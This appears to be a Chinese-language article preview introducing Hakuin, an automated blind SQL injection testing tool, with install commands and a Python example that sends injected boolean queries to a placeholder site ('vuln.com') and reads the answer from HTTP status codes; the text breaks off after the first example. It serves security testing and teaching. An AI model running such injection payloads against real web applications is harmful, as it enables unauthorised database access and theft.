一款自动化SQL盲注（BSQLI）安全检测工具

文章预览

关于Hakuin Hakuin是一款功能强大的SQL盲注漏洞安全检测工具，该工具专门针对BSQLi设计，可以帮助广大研究人员优化BSQLi测试用例，并以自动化的形式完成针对目标Web应用程序的漏洞扫描与检测任务。 安装 要安装 Hakuin，只需运行： pip3 install hakuin 开发人员应该在本地安装该包并设置 -e 可编辑模式的标志： git clone git@github.com:pruzko/hakuin.git cd hakuin pip3 install -e . 例子 一旦确定了 BSQLI 漏洞，就需要告诉 Hakuin 如何注入其查询。为此，从派生一个类 Requester 并重写 request 方法。此外，该方法必须确定查询是否解析为 True 或 False 。 示例 1 - 基于状态推断的查询参数注入 import aiohttp from hakuin import Requester class StatusRequester (Requester) : async def request (self, ctx, query) : r = await aiohttp.get( f'http://vuln.com/?n=XXX" OR ( {query} ) --' ) return r.status == 200 示例 ………………………………